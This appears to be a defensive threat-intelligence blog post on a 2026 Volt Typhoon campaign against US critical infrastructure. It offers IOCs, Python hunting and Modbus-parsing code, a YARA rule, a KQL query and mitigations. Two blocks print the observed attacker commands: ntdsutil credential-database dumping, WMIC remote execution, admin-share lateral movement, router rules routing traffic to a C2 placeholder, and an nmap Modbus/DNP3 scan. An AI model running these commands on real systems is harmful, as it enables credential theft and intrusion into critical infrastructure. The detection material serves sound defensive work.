Volt Typhoon (tracked as Bronze Silhouette, Insidious Taurus, and UNC3236) is a Chinese state-sponsored threat actor that has been systematically targeting and pre-positioning within US and allied critical infrastructure since 2021. The 2026 campaign represents a significant escalation in both scope and operational readiness.
Unlike traditional espionage campaigns that focus on data exfiltration, Volt Typhoon's primary mission is pre-positioning for potential disruption operations — establishing persistent, stealthy access deep within OT networks that can be activated during geopolitical crises to cause physical disruptions to water supply, power grids, and transportation.
The 2026 joint advisory from CISA, FBI, and NSA confirms that Volt Typhoon has successfully achieved persistent access in 23 confirmed critical infrastructure organizations across the energy, water, communications, and transportation sectors. Attribution confidence is HIGH based on infrastructure overlap, TTPs, and signals intelligence.
| Sector | Confirmed Compromises | Dwell Time | OT Impact Risk |
|---|---|---|---|
| Electric Utilities / Power Generation | 7 confirmed | 18-36 months | GRID DISRUPTION |
| Water & Wastewater Treatment | 5 confirmed | 12-24 months | CONTAMINATION RISK |
| Transportation / Rail | 4 confirmed | 8-18 months | SAFETY SYSTEM RISK |
| Telecommunications | 4 confirmed | 12-30 months | COMM BLACKOUT |
| Oil & Gas Pipelines | 3 confirmed | 6-12 months | FLOW DISRUPTION |
Volt Typhoon's signature technique is the near-exclusive use of Living-off-the-Land Binaries (LOLBins) — legitimate system tools that generate minimal alerts, making detection extremely difficult. In OT environments they additionally abuse legitimate engineering workstation software (SCADA HMI tools, PLC programming utilities).
```text
# Volt Typhoon LoTL commands observed in compromised environments (anonymized)
# 1. Initial reconnaissance via WMIC (Living Off the Land)
wmic /node:[TARGET_IP] process call create "cmd.exe /c whoami > C:\Windows\Temp\.tmp"
# 2. Credential dumping via legitimate Windows tools
ntdsutil "activate instance ntds" "ifm" "create full C:\Windows\Temp\IFM" "quit" "quit"
# 3. Lateral movement via legitimate admin shares
net use \\[INTERNAL_IP]\ADMIN$ /user:[DOMAIN]\[USER] [PASSWORD]
robocopy \\[SOURCE]\C$\Windows\Temp\IFM \\[DEST]\ADMIN$\Temp /E /NOCOPY
# 4. VPN router compromise (SOHO/enterprise routers as relay nodes)
# Volt Typhoon creates relay network via compromised Cisco, Netgear, ASUS routers
# Commands run on compromised routers:
ip route add [C2_IP]/32 via [NEXT_HOP] # Silent C2 routing
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination [C2_IP]:443
```
```text
# Observed IT→OT pivot techniques (SCADA/ICS environments)
# 1. Abuse of legitimate remote desktop to HMI workstations
# Volt Typhoon uses legitimate RDP from IT engineering workstations to SCADA HMIs
# No additional malware deployed — uses built-in operator accounts
# 2. SCADA software reconnaissance
# Observed use of legitimate Wonderware, GE iFIX, Siemens WinCC query tools
# to enumerate connected PLCs and RTUs
# 3. PLC command injection research (pre-staging only — not yet executed)
# Evidence of reconnaissance of Modbus TCP port 502, DNP3 port 20000
nmap -sS -p 502,20000,44818,102 --script modbus-discover [OT_SUBNET]
# 4. Historian database access
# Accessed OSIsoft PI Historian to understand operational baselines
# (to time any future disruption operation for maximum impact)
```
| Type | Indicator | Description |
|---|---|---|
| IP | 103.27.108.92 | VT relay node (compromised SOHO router) |
| IP | 154.16.105.173 | C2 infrastructure |
| IP | 185.104.184.247 | VT staging server |
| IP | 45.61.138.111 | Data exfil endpoint |
| Domain | microsft-update[.]com | Lookalike C2 domain |
| Domain | cisco-webauth[.]net | Router compromise C2 |
| File | C:\Windows\Temp\~dfXXXX.tmp | Staging directory pattern |
| Registry | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe | Persistence mechanism |
| Scheduled Task | \Microsoft\Windows\WindowsUpdate\UpdateTask | Persistence via masqueraded update task |
| Process | netsh.exe with tunneling args | LoTL C2 tunneling |
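The network indicators above are published defanged, so a hunt has to refang them and then match with boundaries that reject near-miss IPs and lookalike suffixes. The following is an added example, not code from the advisory or from CyberDudeBivash; the function names (`refang`, `hunt`), the `VT_IOCS` dict and the log lines in `SAMPLE_LOGS` are my own constructions.

```python
import re
from typing import Iterable

# Copied from the IOC table above; domains stay defanged as published and are
# refanged only at match time, so the list itself is never a live link.
VT_IOCS = {
    "ip": ["103.27.108.92", "154.16.105.173", "185.104.184.247", "45.61.138.111"],
    "domain": ["microsft-update[.]com", "cisco-webauth[.]net"],
}

def refang(indicator: str) -> str:
    """Restore a defanged indicator ('[.]', 'hxxp') to its matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")

# Boundaries matter: without them 45.61.138.11 would match 45.61.138.111 as a
# prefix, and a lookalike such as microsft-update.com.example.org would fire.
IP_RE = re.compile(
    r"(?<![\d.])(" + "|".join(re.escape(i) for i in VT_IOCS["ip"]) + r")(?![\d.])"
)
DOMAIN_RE = re.compile(
    r"(?:^|[^\w.-])((?:[\w-]+\.)*("
    + "|".join(re.escape(refang(d)) for d in VT_IOCS["domain"])
    + r"))(?![\w.-])",
    re.IGNORECASE,
)

def hunt(lines: Iterable[str]) -> list[dict]:
    """Return one record per log line that names a Volt Typhoon IP or domain."""
    hits = []
    for n, line in enumerate(lines, 1):
        ip = IP_RE.search(line)
        dom = DOMAIN_RE.search(line)
        if ip or dom:
            hits.append({
                "line": n,
                "ip": ip.group(1) if ip else None,
                "domain": dom.group(2).lower() if dom else None,  # base IOC, not the subdomain
                "raw": line.strip(),
            })
    return hits

# Constructed sample lines, not real logs: a firewall allow to a VT IP, a DNS
# query for a subdomain of a VT domain, a near-miss IP, and a benign proxy entry.
SAMPLE_LOGS = [
    "2026-04-22T03:14:07Z fw01 action=allow src=10.0.0.45 dst=45.61.138.111 dport=443 proto=tcp",
    "2026-04-22T03:14:09Z dns01 client=10.0.0.45 query=cdn.MICROSFT-update.com type=A",
    "2026-04-22T03:15:00Z fw01 action=allow src=10.0.0.45 dst=45.61.138.11 dport=443 proto=tcp",
    "2026-04-22T03:16:12Z proxy01 client=10.0.100.7 url=https://www.cisco.com/ status=200",
]
```

Running `hunt(SAMPLE_LOGS)` returns two hits (lines 1 and 2); the near-miss IP and the benign proxy line are ignored.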
```yara
rule VoltTyphoon_2026_ICS_LoTL_Activity {
    meta:
        description = "Detects Volt Typhoon 2026 LoTL activity targeting ICS/SCADA environments"
        author = "CyberDudeBivash CYBERDUDEBIVASH SENTINEL APEX"
        date = "2026-04-22"
        severity = "CRITICAL"
        threat_actor = "Volt Typhoon / Bronze Silhouette"
        reference = "CISA Advisory AA26-112A"
    strings:
        $lol_ntdsutil = "ntdsutil" nocase fullword
        $lol_wmic_proc = "wmic /node:" nocase
        $lol_netsh_tunnel = "netsh interface portproxy add" nocase
        $vt_staging = "C:\\Windows\\Temp\\~df" nocase
        $vt_c2_domain1 = "microsft-update.com" nocase
        $vt_c2_domain2 = "cisco-webauth.net" nocase
        $vt_reg_ifeo = "Image File Execution Options\\svchost.exe" nocase
        $ot_probe_modbus = { 00 00 00 00 00 06 01 01 00 00 00 01 } // Modbus/TCP read coils request (unit 1, coil 0, qty 1)
        $ot_probe_dnp3 = { 05 64 } // DNP3 data-link start bytes; only 2 bytes, too common to stand alone
        $historian_access = "OSIsoft" nocase
        $historian_access2 = "PI Server" nocase
        $scada_recon = "WinCC" nocase
        $scada_recon2 = "iFIX" nocase
    condition:
        2 of ($lol_*) or
        ($vt_staging and 1 of ($vt_c2_*)) or
        $vt_reg_ifeo or
        $ot_probe_modbus or
        // the 2-byte DNP3 atom matches random binary data; require corroboration
        ($ot_probe_dnp3 and (1 of ($scada_*) or 1 of ($historian_*) or 1 of ($lol_*))) or
        (1 of ($historian_*) and 1 of ($scada_*))
}
```
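The rule's `$ot_probe_modbus` atom is a complete Modbus/TCP request, and a monitor on port 502 gets more out of decoding such frames than out of byte-matching them. This added example (my code, not part of the rule or the advisory) parses the MBAP header and PDU, rejects malformed frames instead of raising, and classifies read-only and identification function codes as discovery traffic; `parse_modbus_tcp`, `is_discovery_probe`, `READ_FUNCTIONS` and the two constructed frames are my own names.

```python
import struct

# Modbus function codes that read state or identity rather than change it.
# A burst of these from an IT-side host against port 502 is the wire-level
# shape of the reconnaissance the advisory describes.
READ_FUNCTIONS = {
    0x01: "Read Coils",
    0x02: "Read Discrete Inputs",
    0x03: "Read Holding Registers",
    0x04: "Read Input Registers",
    0x11: "Report Server ID",
    0x2B: "Encapsulated Interface (Read Device Identification)",
}

def parse_modbus_tcp(adu: bytes) -> dict:
    """Decode a Modbus/TCP ADU: 7-byte MBAP header followed by the PDU.

    Malformed input returns a dict with an 'error' key instead of raising, so a
    passive monitor keeps going on truncated or non-Modbus traffic seen on 502.
    """
    if len(adu) < 8:
        return {"error": "short frame", "len": len(adu)}
    trans_id, proto_id, length, unit_id = struct.unpack(">HHHB", adu[:7])
    if proto_id != 0:
        return {"error": "protocol id %d is not Modbus" % proto_id}
    if length != len(adu) - 6:  # MBAP length counts unit id + PDU
        return {"error": "length mismatch", "declared": length, "actual": len(adu) - 6}
    function, data = adu[7], adu[8:]
    result = {"transaction_id": trans_id, "unit_id": unit_id, "function": function,
              "function_name": READ_FUNCTIONS.get(function, "other"), "data": data.hex()}
    if function in (0x01, 0x02, 0x03, 0x04) and len(data) == 4:
        result["start"], result["quantity"] = struct.unpack(">HH", data)  # address, count
    return result

def is_discovery_probe(adu: bytes) -> bool:
    """True for a well-formed request whose function code only reads or identifies."""
    parsed = parse_modbus_tcp(adu)
    return "error" not in parsed and parsed["function"] in READ_FUNCTIONS

# Constructed frames: the 12 bytes behind the rule's $ot_probe_modbus (read one
# coil at address 0 from unit 1) and a Write Single Register request for contrast.
YARA_PROBE = bytes.fromhex("00 00 00 00 00 06 01 01 00 00 00 01")
WRITE_REQ = bytes.fromhex("00 01 00 00 00 06 01 06 00 10 00 01")
```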
```kql
// Volt Typhoon 2026 ICS/SCADA Activity Detection
// CISA Advisory AA26-112A — CyberDudeBivash CYBERDUDEBIVASH SENTINEL APEX
let VTIPs = pack_array("103.27.108.92","154.16.105.173","185.104.184.247","45.61.138.111");
let VTDomains = pack_array("microsft-update.com","cisco-webauth.net");
// Detect LoTL tool usage (netsh tunneling, wmic remote, ntdsutil)
SecurityEvent
| where EventID == 4688 // Process creation
| where CommandLine has_any ("netsh interface portproxy", "wmic /node:", "ntdsutil", "robocopy \\\\")
    and not(AccountName endswith "$") // Exclude machine accounts
| project TimeGenerated, Computer, AccountName, CommandLine, ParentProcessName
| extend RiskScore = case(
    CommandLine has "portproxy", 90,
    CommandLine has "ntdsutil", 85,
    CommandLine has "wmic /node:", 75,
    50)
| where RiskScore >= 75
// Detect IT-to-OT pivot via unusual RDP to engineering workstations.
// Each branch is wrapped in parentheses so its own operators stay scoped to it
// rather than being applied to the union result.
| union (
    NetworkAccessLogs
    | where Protocol == "TCP" and DestinationPort == 3389
    | where not(SourceIP startswith "10.0.0") or not(DestinationIP startswith "10.0.100") // Adjust to your network segmentation
    | join kind=inner (
        DeviceInfo
        | where DeviceName contains "HMI" or DeviceName contains "SCADA" or DeviceName contains "ENG-WS"
    ) on $left.DestinationIP == $right.PublicIP // PublicIP is the device's external address; map on your inventory's internal IP column for on-premises HMIs
)
// Detect C2 connections to VT infrastructure
| union (
    CommonSecurityLog
    | where DestinationIP in (VTIPs) or DestinationHostName has_any (VTDomains)
    | project TimeGenerated, SourceIP, DestinationIP, DestinationHostName, DeviceAction
)
```
| Priority | Control | Detail |
|---|---|---|
| P0 | Network Segmentation Audit | Verify IT/OT air gap. Enumerate all IT-to-OT connections. Close unauthorized paths — especially RDP to HMI workstations. |
| P0 | Hunt for VT IOCs | Search for VT IP/domain IOCs in firewall logs, DNS logs, and proxy logs going back 90 days minimum. |
| P0 | Privileged Account Audit | Audit all accounts with OT access. Reset all passwords. Disable all accounts not in active use. Enforce MFA for remote access. |
| P1 | SOHO Router Firmware | Update all perimeter SOHO/SMB routers immediately. These are used as LoTL relay nodes by VT. |
| P1 | Historian & SCADA Logging | Enable detailed logging on all SCADA historians (OSIsoft PI, Ignition). Establish baselines for normal query patterns. |
| P1 | OT Asset Inventory | Passive OT asset discovery (Claroty, Dragos, Nozomi). Know every PLC, RTU, HMI on your OT network. |
| P2 | ICS-CERT Reporting | Report any suspected Volt Typhoon activity to CISA (cisa.gov/report) and ICS-CERT immediately. |
| P2 | Incident Response Planning | Test your OT incident response plan. Practice isolated OT recovery. Ensure manual override procedures are documented. |